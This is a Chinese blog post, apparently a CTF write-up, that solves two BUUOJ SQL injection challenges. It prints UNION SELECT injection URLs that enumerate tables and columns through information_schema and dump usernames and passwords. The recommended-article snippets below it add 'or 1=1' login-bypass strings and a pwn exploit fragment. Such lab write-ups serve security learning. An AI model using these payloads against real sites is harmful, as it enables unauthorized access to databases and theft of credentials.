[BUUOJ]两道简单的SQL注入(EasySQL与LoveSQL)

最新推荐文章于 2022-08-18 01:06:22 发布
最新推荐文章于 2022-08-18 01:06:22 发布
阅读量7.7k 收藏 1
点赞数 2
分类专栏: 安全学习 # CTF记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/solitudi/article/details/107663065
版权

文章目录


前言:有时候使用#符号会没用,可以用url编码代替%23,基础注入与报错注入都可以解除来这两道题,判断是否为字符型懒得记录下来

EasySQL

通过order by得到有3列
/check.php?username=1' union select 4,2,3%23&password=1
在这里插入图片描述
得到回显点位为2和3,查询当前数据库名及版本
开始爆表
/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1
在这里插入图片描述
/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1
在这里插入图片描述
得到数据与Flag:
/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1

LoveSQL

至于是数字型还是字符型不想写下来记录
首先利用order by查出有三列
迷惑行为,非预期解
在这里插入图片描述

Y4tacker
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuoj re逆向49-64题writeup(截图+c++源码+过程).doc
12-31
文章上传不了,用word的形式上传,buuoj re 逆向49-64题writeup(截图+c++源码+过程)
buuoj EasySQL writeup
m0_73605862的博客
05-07 94
Step1:发现是sql注入,直接使用万能密码 admin’ or 1=1#。发现直接得到flag。【来源】(buuoj)https://buuoj.cn/【题目】[极客大挑战 2019]EasySQL。【思路】进行sql注入的万能密码。
buuctf_[SUCTF 2019]EasySQL【手工注入】
qq_61968245的博客
12-19 303
0x01 题目链接 BUUCTF在线评测https://buuoj.cn/challenges 0x02 题目 分析判断:输入数字时有回显,输入非数字时无回显' 猜测报错注入:输入1’无回显,证明报错注入行不通 万能钥匙测试 1' or 1=1# 1' or 1=1--+ 猜测可能被过滤了【注:可能会问为什么我知道用query接收参数,ctrl+u,可以找到文本框的name值就是query】 接下来,就剩下时间盲注、布尔盲注、堆叠注入了,先从堆叠注入开始,因为语句..
每天一道CTF---BUUCTF---练习场----EasySQL1---
qq_51550750的博客
01-14 582
每天一道CTF 思路: 点击“登陆”: 利用 hackbar load: http://16af3314-26ae-4fc9-a578-dc1a13f86569.node4.buuoj.cn:81/check.php?username=1&password=1 http://16af3314-26ae-4fc9-a578-dc1a13f86569.node4.buuoj.cn:81/check.php?username=1’ – -&password=1 http://16af3
[buuoj][极客大挑战 2019]LoveSQL
qq_42250840的博客
06-27 160
考点: sql注入 复现: 进去之后我们试一下万能密码先 转到了check.php,告诉我们用户名和密码,但是并不是flag 考虑注入 先查询字段数: admin' order by 1 # admin' order by 2 # admin' order by 3 # admin' order by 4 # 到4的时候报错,一共有3个字段 接下来用union查询测试注入点: 1' union select 1,2,3 # 找到回显位置 查询数据库名 1' union select 1,2,da
BUU pwn 刷题
qq_36495104的博客
05-19 1448
这里基本都是栈溢出题,没什么技术含量,只作为记录 [第五空间2019 决赛]PWN5 查看保护 开启了canary和栈不可执行保护 IDA反编译得到main函数 int __cdecl main(int a1) { unsigned int v1; // eax int fd; // ST14_4 int result; // eax char nptr; // [esp+4h] [ebp-80h] char buf; // [esp+14h] [ebp-70h] unsigned
buuoj re逆向1-64题writeup(截图+c++源码+过程).rar
12-31
buuoj re逆向1-64题writeup(截图+c++源码+过程) 与前面发的一模一样,只不过打包了,喜欢的可以支持一下
java外贸网站源码-buuoj:浮标
06-05
新增班级管理与布置作业功能 现代化的界面 + 手机适配 实时爬取自定义用户的博客和其他OJ的做题数 丰富的算法知识和体系化的套题训练 模块列表 使用Docker部署 环境准备 1. 安装必要的依赖 sudo apt-get update sudo...
buuojweb刷题wp详解及知识整理—-【护网杯】easy_tornado(模板注入+md5)
01-20
服务端模板注入也是一种注入攻击(简称为SSTL) 这又涉及到了本人的知识盲区 借这个题学习补充一下知识 自己走过的路加wp辅助 信息收集加思路推理 点击一下/welcome.txt 回显 render 而且url处有异常 同理测试其他...
GreatEscape
10-24
GreatEscape
CTF buuoj pwn-----第2题:rip
bing_Max的博客
08-28 2370
CTF buuoj pwn-----第2题:rip 记录一下pwn的过程 同第1题一样,新手学习日记,流水线记录. 打开题目,连接靶机,下载文件’ript’ 1. 首先checkesc ,检测文件的保护机制. checksec在下载好pwntools后就有 参考链接: link. 参考链接: link. bing@bing-virtual-machine:~/pwn$ checksec test [*] '/home/bing/pwn/test' Arch: amd64-64-lit
BUUCTFweb比赛做题记录
qq_51558360的博客
03-16 818
[VNCTF 2021]Ez_game 打开为通过游戏 手打通关是不可能的 法一:在控制台输入winTimer.Set(); 法二: https://www.sojson.com/jsobfuscator.html 输入winTimer[“endTime”]=99 得到加密,并复制到控制台,回车即可 不可以看全flag,那么就Ctrl和-来放小一点即可 [GKCTF2020]老八小超市儿 做题之前先来小菜: 就知道默认后台就是admin.php, 登入的默认账号密码是admin和shopxo。 输入
[蓝帽杯 2021]One Pointer PHP
snowlyzz的博客
08-18 207
学会FPM未授权攻击
buuoj刷题记录 - [极客大挑战 2019]Not Bad
qq_34010404的博客
03-28 277
检查一下保护: 程序很简单,存在栈溢出漏洞,只能溢出16个字节。 只允许orw系统调用. 前八个字节用来jmp rsp ,紧接着加上5个字节近转移 call到buff的开始处执行. 这样就可以往buf里面写gadget来往指定地址处读入shellcode 之后跳转到shellcode把flag读出来 exp: from pwn import* #sh = process('./pwn') sh = remote('node4.buuoj.cn',29515) context.arch= 'x86_6
[BUU刷题记录]day01-起步
anwen12的博客
12-13 4268
BUU-WEB 这是一个菜鸡的蜕变 先小记录一下题目环境部署必备的docker安装 sudo apt-get remove docker docker-engine docker.io containerd runc sudo apt-get update sudo apt-get install apt-transport-https ca-certificates curl gnupg lsb-release curl -fsSL https://download.docker.com/linux
蓝帽杯2021 One Pointer PHP
Tajang的大千世界
11-23 3602
第一次打FPM/FastCGI的题,实际上也是第一次接触打中间件的题,刚开始是在陇原战“疫”碰到了一道类似的题,也是改编的这道,为了更好地复现这道题,理解这道题,我去把Fastcgi 协议分析与 PHP-FPM 攻击方法都看了几遍。攻击的实操部分,本来想着复现,但那个鬼环境一直差点意思。这里不得不提中国网安界大神——phith0n,P神开创的vulhub确实帮了国内外网络安全学习者的大忙,让安全研究者更加专注于漏洞原理本身,而不是忙于搭建复杂的漏洞环境。但不幸的事,这个洞的环境坏了,问了P神说官网要下架,让
今天你pwn了吗(中)
合天网安学院
05-15 745
Y今天你pwn了吗前言:"二进制太难了", 一起到 buu 开始 刷题吧。这里 仅记录下非高分题目的解题思路和知识讲解。特别是文章里的函数,我特意整理了下,希望我能在二进...
BUU[极客大挑战]LoveSQL
Marsper的博客
11-16 295
题目链接:http://8d2d10b1-b8e7-4ce4-a2f2-6b58d8c77ae9.node3.buuoj.cn/ 首先,测试发现是单引号的字符型注入 万能密码登录测试 用户名:admin’ or 1=1 # 密码:1 登陆成功后使用联合查询。 注意:输入框的#,直接使用hackbar地址栏,需将#进行URL编码,即替换为%23 一、爆字段 使用order by语句 check.php?username=admin' order by 1 %23&password=1 check.
wireshark buuoj
最新发布
10-19
Wireshark是一款网络协议分析...而buuoj是一个CTF平台,提供了各种各样的CTF题目,包括网络安全、二进制安全、密码学等等。在CTF比赛中,Wireshark可以帮助选手分析网络流量,找到有用的信息,解决一些网络安全问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值